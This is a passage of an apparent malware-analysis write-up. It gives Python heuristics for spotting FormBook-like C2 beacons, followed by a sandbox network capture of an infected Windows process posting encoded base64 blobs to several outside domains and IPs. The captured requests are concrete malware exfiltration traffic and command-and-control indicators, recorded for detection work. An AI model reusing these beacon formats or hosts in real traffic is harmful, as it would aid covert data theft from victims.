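    host = headers.get("host", "")
    hits = []
    if headers.get("user-agent") == OBSERVED_UA:
        hits.append("static Mac Firefox 40 User-Agent")
    if SHORT_DIR_PATH.match(url.path):
        hits.append("short directory-style path")
    payload = body if method == "POST" else url.query
    if any(len(k) <= 3 and is_raw_base64_blob(v) for k, v in split_form(payload)):
        hits.append("short key with raw base64 blob")
    if (headers.get("origin") == "http://" + host
            and headers.get("referer") == "http://" + host + url.path):
        hits.append("self-referential Origin/Referer")
    return hits


def is_formbook_like(raw_request, threshold=3):
    """Flag when at least `threshold` indicators fire (threshold is our choice)."""
    return len(beacon_indicators(raw_request)) >= threshold


# Session 17 POST and session 20 GET, transcribed from the report; headers the
# heuristic does not read are left out, the payloads are verbatim.
POST_R6TM = (
    "POST /r6tm/ HTTP/1.1\r\n"
    "Host: www.bnmlk.org\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Origin: http://www.bnmlk.org\r\n"
    "Referer: http://www.bnmlk.org/r6tm/\r\n"
    f"User-Agent: {OBSERVED_UA}\r\n"
    "\r\n"
    "V6h=51DU5kSYZLLtXCJHARd6+L5IweGdVxiLuop3vXt7tVszN+c/MyR0CoWDgXxbxjUEr5AAPttouPPLuXhsAb5nHybfHHDrl7bGBwkrCUthT/aj1Hga92e+SJ5PurWr7/HKSakHESSn2Ca2w9yfJSyOajioealc5VHLvCrswa7G/VWh5A5cPmMsTx4Lo7/32qsAr93ztBc="
)
GET_R6TM = (
    "GET /r6tm/?sH=nVVHdDTx2PSTVJ&V6h=03r06RSocIWRHlQMBHZ7/ZdxuKKmGlmlv7BltFVQgkYFIdRnDBF7O8WDu3tP30gBrpd5Hehkjcnr6TVmd9giBmXATSrzqLCUTktLP3Nid+3n62oF5w/Mdat6l5CFzOydDA== HTTP/1.1\r\n"
    "Host: www.bnmlk.org\r\n"
    f"User-Agent: {OBSERVED_UA}\r\n"
    "\r\n"
)
# Constructed benign control: an ordinary browser page fetch.
BENIGN_GET = (
    "GET /index.html?lang=en HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/120.0 Safari/537.36\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for name, req in (("POST", POST_R6TM), ("GET", GET_R6TM), ("benign", BENIGN_GET)):
        print(name, is_formbook_like(req), beacon_indicators(req))
```

The User-Agent test is an exact string match, so it is only as durable as this sample's build; in production pair it with host context (a Windows process emitting a Mac browser string, as the Process column above shows) and treat the path regex as a starting point, since the report exhibits only the /r6tm/ and /ld3u/ paths. The GET in session 20 scores three indicators without any Origin or Referer, which is why the threshold sits at three rather than four.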


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    21 | 192.168.2.5 | 57212 | 34.149.87.45 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:17.488027096 CEST | 720 | OUT | POST /ld3u/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.smokesandhoney.com
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.smokesandhoney.com
                                                    Referer: http://www.smokesandhoney.com/ld3u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 32 65 36 53 4f 79 68 68 68 68 74 6d 6f 71 46 6e 6c 2b 69 45 74 45 6f 7a 78 70 71 6c 37 64 5a 68 6a 4c 67 38 30 79 66 78 71 44 6c 74 42 47 30 47 39 76 5a 77 38 4a 31 54 36 71 48 79 41 77 58 57 55 58 43 44 68 6b 70 62 69 32 66 6c 6b 74 38 2b 2b 62 72 53 6d 34 39 79 64 7a 6b 67 71 6f 57 33 31 47 55 6a 54 53 65 6b 52 68 68 5a 30 68 62 71 4d 71 4a 5a 68 50 65 48 43 53 54 70 4f 41 7a 68 4d 55 38 75 51 72 30 2f 6a 52 2b 58 74 49 41 51 36 76 4b 31 70 73 70 54 57 48 54 62 6f 30 48 61 76 31 56 51 54 37 42 58 7a 75 5a 46 79 42 44 33 55 58 4b 76 73 34 67 52 58 70 52 74 62 78 51 63 37 62 68 32 2b 2f 38 3d
                                                    Data Ascii: V6h=2e6SOyhhhhtmoqFnl+iEtEozxpql7dZhjLg80yfxqDltBG0G9vZw8J1T6qHyAwXWUXCDhkpbi2flkt8++brSm49ydzkgqoW31GUjTSekRhhZ0hbqMqJZhPeHCSTpOAzhMU8uQr0/jR+XtIAQ6vK1pspTWHTbo0Hav1VQT7BXzuZFyBD3UXKvs4gRXpRtbxQc7bh2+/8=
                                                    Sep 5, 2024 14:26:17.948947906 CEST | 394 | IN | HTTP/1.1 301 Moved Permanently
                                                    Content-Length: 0
                                                    Location: https://www.smokesandhoney.com/ld3u/
                                                    Accept-Ranges: bytes
                                                    Date: Thu, 05 Sep 2024 12:26:17 GMT
                                                    X-Served-By: cache-iad-kiad7000133-IAD
                                                    X-Cache: MISS
                                                    X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=
                                                    Via: 1.1 google
                                                    glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                    Connection: close


                                                    Session ID: 22 | Source IP: 192.168.2.5 | Source Port: 57213 | Destination IP: 34.149.87.45 | Destination Port: 80 | PID: 2672 | Process: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:20.028033972 CEST | 740 | OUT | POST /ld3u/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.smokesandhoney.com
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.smokesandhoney.com
                                                    Referer: http://www.smokesandhoney.com/ld3u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h=2e6SOyhhhhtmpLVn2NKErkow/Jqly9ZljLk80zrbtxRtBnEGv+Zw/J1T9aHzOQXNUXOxhkVbi2Llkts++qrTno98EjkilIW31GUjTWOCRgFZ0RLqeIha9feAViTpKAzlMU8cQqYRjSWXtKoQ5+K6ispVLXS3tXW3mWVkRLQgsMtr+XudO1CH/YMpH6ZaKBx1h4xGgooug6Ew2cKwXuhEqzSmPq9l
                                                    Sep 5, 2024 14:26:20.494457006 CEST | 394 | IN | HTTP/1.1 301 Moved Permanently
                                                    Content-Length: 0
                                                    Location: https://www.smokesandhoney.com/ld3u/
                                                    Accept-Ranges: bytes
                                                    Date: Thu, 05 Sep 2024 12:26:20 GMT
                                                    X-Served-By: cache-iad-kcgs7200119-IAD
                                                    X-Cache: MISS
                                                    X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,AHc3TXLcXOul+t9LIbGg9ciHE4dbw+wewoJ5nvKoyjE=
                                                    Via: 1.1 google
                                                    glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                    Connection: close


                                                    Session ID: 23 | Source IP: 192.168.2.5 | Source Port: 57214 | Destination IP: 34.149.87.45 | Destination Port: 80 | PID: 2672 | Process: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:22.556262970 CEST | 1757 | OUT | POST /ld3u/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.smokesandhoney.com
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.smokesandhoney.com
                                                    Referer: http://www.smokesandhoney.com/ld3u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h=[TRUNCATED]
                                                    Sep 5, 2024 14:26:23.015678883 CEST | 394 | IN | HTTP/1.1 301 Moved Permanently
                                                    Content-Length: 0
                                                    Location: https://www.smokesandhoney.com/ld3u/
                                                    Accept-Ranges: bytes
                                                    Date: Thu, 05 Sep 2024 12:26:22 GMT
                                                    X-Served-By: cache-iad-kcgs7200068-IAD
                                                    X-Cache: MISS
                                                    X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,jKB0KR2wTEE1MYSdxvKSbciHE4dbw+wewoJ5nvKoyjE=
                                                    Via: 1.1 google
                                                    glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                    Connection: close


                                                    Session ID: 24 | Source IP: 192.168.2.5 | Source Port: 57215 | Destination IP: 34.149.87.45 | Destination Port: 80 | PID: 2672 | Process: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:25.086555004 CEST | 453 | OUT | GET /ld3u/?V6h=7cSyNGFy/S5quoM6udyikngV4L2ptvlq1/kf9BPZtTlwCENfjvle2IZfxcv5JQLEZFLmm1935WPn1s0g14qVusJPQGgEr6+5yVxfblixZgca2mD/C/dkht+8dQzCD1+Jew==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.smokesandhoney.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:26:25.546081066 CEST | 549 | IN | HTTP/1.1 301 Moved Permanently
                                                    Content-Length: 0
                                                    Location: https://www.smokesandhoney.com/ld3u/?V6h=7cSyNGFy/S5quoM6udyikngV4L2ptvlq1/kf9BPZtTlwCENfjvle2IZfxcv5JQLEZFLmm1935WPn1s0g14qVusJPQGgEr6+5yVxfblixZgca2mD/C/dkht+8dQzCD1+Jew==&sH=nVVHdDTx2PSTVJ
                                                    Accept-Ranges: bytes
                                                    Date: Thu, 05 Sep 2024 12:26:25 GMT
                                                    X-Served-By: cache-iad-kjyo7100056-IAD
                                                    X-Cache: MISS
                                                    X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,AHc3TXLcXOul+t9LIbGg9ciHE4dbw+wewoJ5nvKoyjE=
                                                    Via: 1.1 google
                                                    glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                    Connection: close


                                                    Session ID: 25 | Source IP: 192.168.2.5 | Source Port: 57216 | Destination IP: 91.203.110.247 | Destination Port: 80 | PID: 2672 | Process: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:30.605568886 CEST | 711 | OUT | POST /ccpi/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.wildenmann.shop
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.wildenmann.shop
                                                    Referer: http://www.wildenmann.shop/ccpi/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h=w4H9B/pVrzGibzLip6gyHI/gbxWvNvxx9Iabhw3MqwZm0ifnppw7Dp5Oyeil11khKdCX9l2xecYLiE0QoWR/y99XlpiPRXAe1uGdrKpr1YLWtop8rj1ev/tRLO1oJ+IyeLviR32FyfdZiOfQfWyLs/TUoWEBd/cgcXMY2veqW80iyTT35FLLQdep5X7imlrhIxkSpy0=
                                                    Sep 5, 2024 14:26:31.226120949 CEST | 926 | IN | HTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    content-type: text/html
                                                    content-length: 707
                                                    date: Thu, 05 Sep 2024 12:26:31 GMT
                                                    server: LiteSpeed
                                                    location: http://wildenmann.shop/ccpi/
                                                    x-powered-by: PleskLin
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                    Session ID: 26 | Source IP: 192.168.2.5 | Source Port: 57217 | Destination IP: 91.203.110.247 | Destination Port: 80 | PID: 2672 | Process: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:33.248716116 CEST | 731 | OUT | POST /ccpi/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.wildenmann.shop
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.wildenmann.shop
                                                    Referer: http://www.wildenmann.shop/ccpi/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h=w4H9B/pVrzGibSbivdMyPI/nexWvDPx19IWbhz6RtCNmx3jnqqo7K55O6+ik7VkQKdH09gOxecMLiFEQohNwzt9ZtJi3VXAe1uGdrKtR1YTWt4Z8qC1BlftSc+1of+I2eLvAR2rSyaRZiLjQcCeEj/TSl2FTM8t5FXlQrffoVtUt+F+djnDjD9yRpEzV3VKISS0i3ljfrftZXsnT/eKoC85ekaUk
                                                    Sep 5, 2024 14:26:33.887597084 CEST | 926 | IN | HTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    content-type: text/html
                                                    content-length: 707
                                                    date: Thu, 05 Sep 2024 12:26:33 GMT
                                                    server: LiteSpeed
                                                    location: http://wildenmann.shop/ccpi/
                                                    x-powered-by: PleskLin
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                    Session ID: 27 | Source IP: 192.168.2.5 | Source Port: 57218 | Destination IP: 91.203.110.247 | Destination Port: 80 | PID: 2672 | Process: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:35.796065092 CEST | 1748 | OUT | POST /ccpi/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.wildenmann.shop
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.wildenmann.shop
                                                    Referer: http://www.wildenmann.shop/ccpi/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h=[TRUNCATED]
                                                    Sep 5, 2024 14:26:36.447278976 CEST | 926 | IN | HTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    content-type: text/html
                                                    content-length: 707
                                                    date: Thu, 05 Sep 2024 12:26:36 GMT
                                                    server: LiteSpeed
                                                    location: http://wildenmann.shop/ccpi/
                                                    x-powered-by: PleskLin
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                    Session ID: 28 | Source IP: 192.168.2.5 | Source Port: 57219 | Destination IP: 91.203.110.247 | Destination Port: 80 | PID: 2672 | Process: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:38.340058088 CEST | 450 | OUT | GET /ccpi/?sH=nVVHdDTx2PSTVJ&V6h=96vdCLF6vzOjbBC3mbkrC4zzUz2rd8Vx/oWpiC2btghNh3zo1JohGtlH0OSuyloWV4aL4gulV88Z8WUGiHxG/5dbitedT3dwls/KnYRS+O7Xw5tFmWV2oMBDB9F7a8JBDA== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.wildenmann.shop
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:26:38.962238073 CEST | 1081 | IN | HTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    content-type: text/html
                                                    content-length: 707
                                                    date: Thu, 05 Sep 2024 12:26:38 GMT
                                                    server: LiteSpeed
                                                    location: http://wildenmann.shop/ccpi/?sH=nVVHdDTx2PSTVJ&V6h=96vdCLF6vzOjbBC3mbkrC4zzUz2rd8Vx/oWpiC2btghNh3zo1JohGtlH0OSuyloWV4aL4gulV88Z8WUGiHxG/5dbitedT3dwls/KnYRS+O7Xw5tFmWV2oMBDB9F7a8JBDA==
                                                    x-powered-by: PleskLin
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                    Session ID: 29 | Source IP: 192.168.2.5 | Source Port: 57220 | Destination IP: 34.149.87.45 | Destination Port: 80 | PID: 2672 | Process: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:44.030093908 CEST | 717 | OUT | POST /lztc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.formytinyhome.com
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.formytinyhome.com
                                                    Referer: http://www.formytinyhome.com/lztc/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h=2Me1hDQn64iv7u9ssEOW3g9Oxgo1E7R+vnnS/++AgnpY04vm/tlY4n3arNW3jnixcKihtDa8o3RDG5GKuoDR1QjWLwPeYHCtMh7ai8yf9W7zdkFH98RKCjpesdTSvugTvdbtaFfTpBoi6YVd4Kk+3cSC2bPkr00F1wbgihNw0pz9SGW7uJvPGiw6ZsYKq3P5iteDNFA=
                                                    Sep 5, 2024 14:26:44.499119997 CEST | 393 | IN | HTTP/1.1 301 Moved Permanently
                                                    Content-Length: 0
                                                    Location: https://www.formytinyhome.com/lztc/
                                                    Accept-Ranges: bytes
                                                    Date: Thu, 05 Sep 2024 12:26:44 GMT
                                                    X-Served-By: cache-iad-kiad7000163-IAD
                                                    X-Cache: MISS
                                                    X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,AHc3TXLcXOul+t9LIbGg9ciHE4dbw+wewoJ5nvKoyjE=
                                                    Via: 1.1 google
                                                    glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    30 | 192.168.2.5 | 57221 | 34.149.87.45 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:46.574439049 CEST | 737 | OUT | POST /lztc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.formytinyhome.com
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.formytinyhome.com
                                                    Referer: http://www.formytinyhome.com/lztc/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 32 4d 65 31 68 44 51 6e 36 34 69 76 36 4e 6c 73 2f 56 4f 57 79 41 39 50 74 77 6f 31 4f 62 52 69 76 6e 72 53 2f 36 6e 64 6a 56 4e 59 30 5a 66 6d 2b 73 6c 59 37 6e 33 61 79 39 57 32 74 48 69 75 63 4b 2b 54 74 47 69 38 6f 78 39 44 47 39 4b 4b 75 35 44 57 30 41 6a 55 45 51 50 63 63 48 43 74 4d 68 37 61 69 39 57 31 39 57 6a 7a 63 58 74 48 2b 5a 78 46 63 54 70 64 72 64 54 53 72 75 67 74 76 64 62 62 61 48 72 35 70 45 73 69 36 61 39 64 70 37 6b 39 34 63 53 41 35 37 4f 7a 75 47 56 51 79 53 6e 64 74 33 39 74 70 4a 76 50 61 51 37 52 30 72 6e 6e 56 43 63 43 4a 2f 51 39 37 48 75 51 34 4f 4f 7a 54 53 56 52 44 56 36 48 48 59 61 62 71 49 71 2f 42 31 64 4f 61 4a 66 2b
                                                    Data Ascii: V6h=2Me1hDQn64iv6Nls/VOWyA9Ptwo1ObRivnrS/6ndjVNY0Zfm+slY7n3ay9W2tHiucK+TtGi8ox9DG9KKu5DW0AjUEQPccHCtMh7ai9W19WjzcXtH+ZxFcTpdrdTSrugtvdbbaHr5pEsi6a9dp7k94cSA57OzuGVQySndt39tpJvPaQ7R0rnnVCcCJ/Q97HuQ4OOzTSVRDV6HHYabqIq/B1dOaJf+
                                                    Sep 5, 2024 14:26:47.030900955 CEST | 393 | IN | HTTP/1.1 301 Moved Permanently
                                                    Content-Length: 0
                                                    Location: https://www.formytinyhome.com/lztc/
                                                    Accept-Ranges: bytes
                                                    Date: Thu, 05 Sep 2024 12:26:46 GMT
                                                    X-Served-By: cache-iad-kiad7000094-IAD
                                                    X-Cache: MISS
                                                    X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,AHc3TXLcXOul+t9LIbGg9ciHE4dbw+wewoJ5nvKoyjE=
                                                    Via: 1.1 google
                                                    glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    31 | 192.168.2.5 | 57222 | 34.149.87.45 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:49.224646091 CEST | 1754 | OUT | POST /lztc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.formytinyhome.com
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.formytinyhome.com
                                                    Referer: http://www.formytinyhome.com/lztc/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 32 4d 65 31 68 44 51 6e 36 34 69 76 36 4e 6c 73 2f 56 4f 57 79 41 39 50 74 77 6f 31 4f 62 52 69 76 6e 72 53 2f 36 6e 64 6a 56 46 59 30 72 6e 6d 34 50 4e 59 36 6e 33 61 74 4e 57 37 74 48 6a 30 63 4b 32 58 74 47 65 57 6f 30 68 44 48 65 43 4b 37 39 66 57 2b 41 6a 55 63 67 50 5a 59 48 44 6c 4d 6c 58 57 69 39 47 31 39 57 6a 7a 63 52 52 48 71 63 52 46 65 54 70 65 73 64 54 65 76 75 67 57 76 64 54 4c 61 48 2f 44 70 33 55 69 36 36 74 64 72 70 38 39 31 63 53 47 36 37 4f 37 75 47 59 41 79 57 47 73 74 7a 30 6c 70 4c 76 50 4b 78 36 31 6a 66 6a 4b 4f 44 55 67 47 49 56 66 74 58 2b 32 77 74 4f 57 57 42 68 6a 49 31 57 76 45 75 65 63 6f 37 50 73 43 6b 4e 45 57 35 36 74 62 73 54 63 6a 61 2b 66 63 75 46 55 33 35 31 63 59 6e 55 48 6d 75 6c 62 5a 44 79 48 32 36 68 78 43 55 6a 62 42 72 30 61 37 33 4f 70 35 52 56 70 68 38 52 6a 2f 2f 32 6e 6f 44 32 34 57 4c 39 51 4c 2f 66 6b 2f 42 37 6b 43 4d 55 4a 37 73 51 6f 4c 69 2b 37 6d 78 73 7a 62 42 6e 48 4f 58 52 71 77 76 77 42 42 7a 38 58 74 52 77 33 4a 7a 33 6b 63 64 [TRUNCATED]
